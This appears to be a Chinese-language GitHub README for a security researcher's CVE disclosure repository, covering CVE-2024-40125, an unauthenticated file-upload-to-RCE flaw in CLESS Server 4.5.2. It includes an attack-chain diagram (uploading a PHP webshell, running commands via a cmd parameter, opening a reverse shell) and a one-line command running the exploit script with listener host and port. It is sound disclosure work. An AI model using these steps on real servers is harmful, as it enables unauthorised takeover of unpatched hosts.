0xbr3n/My-CVEs
GitHub: 0xbr3n/My-CVEs
安全研究员个人维护的 CVE 漏洞披露仓库,提供已发现漏洞的详细分析、PoC 利用脚本和完整复现步骤。
Stars: 0 | Forks: 0
# 🔴 我的-CVEs
[](https://0xbr3n.com)
[](#cve-index)
[](https://nvd.nist.gov/vuln/search/results?query=brendon+teo)
[](#responsible-disclosure-policy)
## 📋 CVE 索引
| CVE ID | 严重程度 | CVSS | 产品 | 类型 | 发布时间 |
|--------|----------|------|---------|------|-----------|
| [CVE-2024-40125](#-cve-2024-40125) | 🔴 **严重** | **9.8** | Closed-Loop Technology CLESS Server v4.5.2 | 任意文件上传 → RCE | 2024年9月19日 |
## 🔴 CVE-2024-40125
```
CVE ID : CVE-2024-40125
CVSS : 9.8 (CRITICAL)
Vector : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWE : CWE-434 — Unrestricted Upload of File with Dangerous Type
Vendor : Closed-Loop Technology
Product : CLESS Server
Version : ≤ 4.5.2
Patch : 4.5.3+
Status : ✅ Patched · ✅ NVD Published · ✅ PoC Released
```
### 描述
Closed-Loop Technology CLESS Server 4.5.2 及更早版本的 **Media Manager** 功能中存在任意文件上传漏洞。上传端点**不执行任何文件类型验证**,也**不进行身份验证检查**,使得未经身份验证的远程攻击者可以直接将精心制作的 PHP webshell 上传到服务器。
上传完成后,可以通过 `/media/` 目录下的可预测路径立即访问该文件,使攻击者能够执行任意的操作系统命令——从而导致使用 Web 服务器进程的权限进行**完整的远程代码执行 (RCE)**,在测试环境中该进程以 `NT AUTHORITY\SYSTEM` 身份运行,从而获得了对该 Windows 主机的**完全管理员访问权限**。
### 影响
| 类别 | 详情 |
|---|---|
| **机密性** | 高 — 完整的文件系统读取权限 |
| **完整性** | 高 — 任意文件写入与代码执行 |
| **可用性** | 高 — 服务中断或完全接管主机 |
| **身份验证要求** | ❌ 无 — 完全无需身份验证 |
| **网络访问** | ✅ 远程 — 可通过互联网利用 |
### 攻击链
```
Attacker
│
├─[1]─▶ GET /upload ──────────────────────────▶ CLESS Server
│ │
├─[2]─▶ POST /upload (multipart, shell.php) ──▶ No auth check
│ No file validation
│ ◀── {"status":"success"} ──────────────┘
│
├─[3]─▶ GET /media/shell.php?cmd=whoami ──────▶ RCE
│
│ ◀── "nt authority\system" ──────────────
│
└─[4]─▶ Reverse shell / full admin access ✓
```
### 概念验证
有关完整的 PoC、payload 和利用步骤,请参阅 [CVE-2024-40125](./CVE-2024-40125) 文件夹。
```
# 快速演示 (需要 authorised target)
cd CVE-2024-40125
python3 CVE-2024-40125.py --target http://TARGET_IP --lhost YOUR_IP --lport 4444
```
### 时间线
| 日期 | 事件 |
|---|---|
| 2024 | 在授权的安全测试任务中发现该漏洞 |
| 2024 | 通过负责任的披露机制通知了供应商 |
| 2024 | 供应商已确认并在 v4.5.3 中完成修复 |
| **2024年9月19日** | **CVE-2024-40125 在 NVD 上发布** |
| 2024年9月25日 | 在 NVD 上进行了最后修改/补充 |
### 参考
- 🔗 [NVD — CVE-2024-40125](https://nvd.nist.gov/vuln/detail/CVE-2024-40125)
- 🔗 [PoC 漏洞利用](./CVE-2024-40125)
- 🔗 [CVSS 3.1 计算器](https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
## 📁 仓库结构
```
My-CVEs/
└── CVE-2024-40125/
├── CVE-2024-40125.py # Exploit / PoC script
├── README.md # Full advisory and steps to reproduce
└── payload/ # Supporting payloads (if any)
```
## ⚖️ 负责任的披露政策
本仓库中的所有漏洞均是在**授权的安全测试任务**中,或者在我明确获得测试许可的系统上进行的独立研究中发现的。每个 CVE 都经过了负责任的披露:
1. 在公开发布前**通知了供应商**
2. 在 PoC 公开前**确认了修复补丁**
3. 通过官方渠道 (NVD/MITRE) **分配并发布了 CVE**
4. 发布 PoC **仅用于教育和防御目的**
## 📬 联系方式
负责任的漏洞披露、研究合作,或者只是想探讨 CVE?
| 平台 | 链接 |
|---|---|
| Email | [btkl123@gmail.com](mailto:btkl123@gmail.com) |
| LinkedIn | [linkedin.com/in/brendon-teo-195971152](https://www.linkedin.com/in/brendon-teo-195971152/) |
| GitHub | [github.com/brendontkl](https://github.com/brendontkl) |
| Portfolio | [0xbren.com](https://brendontkl.github.io) |
所有研究均在符合道德和负责任的情况下进行 · 新加坡 🇸🇬
标签:0day, CISA项目, CVE, CVSS 9.8, CWE-434, OpenVAS, PHP, PoC, RCE, Webshell, Web安全, 任意文件上传, 安全合规, 情报收集, 数字签名, 数据展示, 暴力破解, 漏洞复现, 漏洞研究, 红队, 编程工具, 网络代理, 网络安全, 蓝队分析, 远程代码执行, 逆向工具, 隐私保护